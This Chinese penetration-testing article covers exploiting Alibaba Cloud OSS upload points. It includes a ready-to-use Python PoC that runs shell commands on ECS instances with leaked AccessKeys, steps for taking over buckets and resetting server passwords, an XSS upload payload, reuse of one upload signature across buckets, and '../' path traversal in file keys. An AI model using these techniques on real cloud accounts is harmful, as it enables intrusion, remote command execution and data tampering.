0x00 前言

OSS渗透目前最常见的方式就是得到Secret Key，那么如果Secret Key并没有被泄露难道就不可以被利用了吗？答案是否定的。

自笔者上篇文章末尾的“全域名”泛滥后，笔者来给大家通过官方给出的API代码分析的方式分析一下Secret Key的复用问题，因为在这里，某里云官方给的demo同样是存在此问题的。

0x01 环境布局

在这里，笔者准备了一个购买了ECS的账号来跟大家进行演示。这个账号的资产为：

一台ECS

两台OSS

0x02 常见姿势总结

在真正的实战中，遇到我们喜爱的上传点时，我们会发现类似于如下HTTP请求：

当Options请求完毕后会发现一个上传包，并且携带了key：

那么此时已经可以确定为OSS上传点。

针对于类似于这种的包，我们会第一时间去翻看网站所引入的所有JavaScript外联，去查看是否在前端泄露了Secret Key。

在这里笔者先给大家简单的叙述一下查找到Secret Key意味着什么。

Access Key可以看作是阿里云的另一种账户密码。
OSS，ECS等等是阿里云账户下的产品，
当这个账户下有OSS产品，我们就可以用accesskey访问这个oss，
如果这个账户下有ECS，我们就能通过这个accesskey去操控ecs，执行命令。

在这里为了方便演示，我们首先将两台服务器设置跨域请求：

然后创建规则：

下面笔者创建一个实战模拟代码

源代码来自：https://files.cnblogs.com/files/ossteam/oss-h5-upload-js-direct.tar.gz

参考：https://www.cnblogs.com/ossteam/p/4942227.html

情况一：Secret Key 泄露

使用F12进行搜索Secret Key：

这是实战中一个典型的Secret Key泄露，也是能让大家眼前一亮的信息，那么我们下一步应该怎么做呢？

使用 oss-browser 来进行管理 oss 服务器

下载地址：http://gosspublic.alicdn.com/oss-browser/1.9.4/oss-browser-win32-x64.zip

在这里我们只需要将阿里云的AccessKeyId与AccessKeySecret填入就可以了。

这里我们就可以对这两台OSS服务器进行增删改查操作。

使用行云管家进行重置ECS密码信息

当然如果只可以管理两台静态服务器，那么这点权限也太小了，我们可以通过行云管家来进行管理ECS。

登陆行云管家：https://yun.cloudbility.com/

填入Access Key ID 与 Access Key Secret 即可接管ECS服务器。

导入成功后这里可以重置系统密码。

重置后ssh登录：

登录成功，但是显然这种非常大的动静并不是我们想要的。那么我们则需要使用OpenApi来实现命令执行。

使用OpenApi来进行命令执行

在OpenApi官网：https://api.aliyun.com/中，存在 CreateCommand 与 InvokeCommand Api，我们可以借用这两个来实现命令执行。

参考文章：https://www.cnblogs.com/J0ng/p/13210147.html

只不过这些步骤太麻烦了，不如编写为POC来进行本地调用。

下面是笔者做好的POC：

#!/usr/bin/env python

#coding=utf-8

import json, base64

from aliyunsdkcore.client import AcsClient

from aliyunsdkcore.acs_exception.exceptions import ClientException

from aliyunsdkcore.acs_exception.exceptions import ServerException

from aliyunsdkecs.request.v20140526.CreateCommandRequest import CreateCommandRequest

from aliyunsdkecs.request.v20140526.InvokeCommandRequest import InvokeCommandRequest

ID = '' # Access Id

KEY = '' # Access Key

reGon = ''            # 地区

InstanceId = [""] # 实例ID

CmdBytes = b'''ls /

'''# 要执行的命令

Cmd = base64.b64encode(CmdBytes).decode('utf-8')

CmdType = "RunShellScript"

# RunBatScript：创建一个在Windows实例中运行的 Bat 脚本。

# RunPowerShellScript：创建一个在Windows实例中运行的PowerShell脚本。

# RunShellScript：创建一个在Linux实例中运行的Shell脚本。

client = AcsClient(ID, KEY, reGon)

request = CreateCommandRequest()

request.set_accept_format('json')

request.set_Name("123123")

request.set_Type("RunShellScript")

request.set_CommandContent(Cmd)

response = client.do_action_with_exception(request)

print(str(response, encoding='utf-8'))

request2 = InvokeCommandRequest()

request2.set_accept_format('json')

request2.set_CommandId((json.loads(response))['CommandId'])

request2.set_InstanceIds(InstanceId)

response = client.do_action_with_exception(request2)

print(str(response, encoding='utf-8'))

只需要简单配置一下就可以了，配置如图：

配置好之后进行执行：

可以从云管理这边看到所执行的命令。

PS: 如果使用POC的方式注意安装Python库：

pip3 install aliyun-python-sdk-core-v3

pip3 install aliyun-python-sdk-cdn

pip3 install aliyun-python-sdk-ecs

情况二：Secret Key 没有泄露

毫无卵用的XSS

既然OSS可以上传任意mime类型，那么我们可以直接上传text/html来进行XSS操作，如图：

参考文章：http://pirogue.org/2017/09/29/aliyunoss/

不知为何，笔者这里复现失败，就不去尝试了。

根据上传点的回显来构造XSS

这也是笔者看到的另一种场景，也就是说，当你上传“1.jpg<script>alert(1)</script>”之后，随后输出在页面上，从而导致XSS，笔者这里也不进行复现了。

参考文章：https://www.freebuf.com/vuls/288206.html

0x03 无需SecretKey的利用方法

好了，总结以上需要SecretKey的攻击手法后，我们再来看一下笔者今天想要说的“无需SecretKey”的利用方式。

根据以上种种案例迹象表明，只有当我们拿到SecretKey后才可以进行更危险的操作。

但是我们根据官方提供的PHP上传API来探究，事情到底是不是得有SecretKey才可以进行利用。

开发人员对待OSS的三种情况：

通过JavaScript直接进行上传

绘图如下：

当然这种方式是最危险的，在前面也讲过利用方式了。

通过Json轮询的方式来进行直接上传

这种方式是笔者见过开发者最多的一种方式，也是某云推荐的使用方式，咱们先看一下例图再进行挖掘它其中的问题。

通过服务器单条线路直接上传

这种方式也是最安全的方式了，大致如下：

在前面的图中我们也看到了，轮询的方式也是一种比较推荐的方式哈，只不过，这个服务器返回给我们的“密钥”到底是什么，我们还真不清楚。

分析问题

那么我们查看官方文档：

那么笔者下载下来之后进行分析源代码：

我们可以看到，ID字段未经任何处理就拼接到了返回包中，signature存放了“密钥能存活多久”的key以及AccessSecretKey，将它们进行sha1加密，可以发现，host确确实实的是一动不动的，该密钥与Host没有一点关系。

那么我们可以猜想：这条密钥就是为了短暂的使用一下AccessKey，过期不候。

那么如果一个人有多台OSS呢？这条密钥是否可以复用。

那么我们捕获该php文件的返回结果，我们观察一下policy的base64解码值，如图：

policy值：

JTdCJTIyZXhwaXJhdGlvbiUyMiUzQSUyMjUxOTAtMDktMjNUMjAlM0ExNyUzQTI0LjAwMFolMjIlMkMlMjJjb25kaXRpb25zJTIyJTNBJTVCJTVCJTIyY29udGVudC1sZW5ndGgtcmFuZ2UlMjIlMkMwJTJDMTA0ODU3NjAwMCU1RCUyQyU1QiUyMnN0YXJ0cy13aXRoJTIyJTJDJTIyJTI0a2V5JTIyJTJDJTIydXNlci1kaXItcHJlZml4JTVDLyUyMiU1RCU1RCU3RA==

Base解密：

那么我们使用它们对tester1服务器进行文件上传操作：

可以看到，成功上传，那么我们将目标改为tester2，看返回结果：

可以看到，同一份密钥是可以上传多个服务器的。

利用场景

根据笔者所发布的《记一次授权导致的全域名沦陷》：https://www.freebuf.com/vuls/303620.html，例图可以为：

简单的过滤绕过：

如果手上已经持有了密钥，通过这次实验，则可以向该KeyId使用者的任意OSS服务器上传任意文件，只不过这里还有一点，有些上传点是必须要指明目录的，例如：

则key只能为Temp下的，但是我们可以生成带有../的文件名，如图：

这样依然可以生成凭据，从而进行任意目录上传。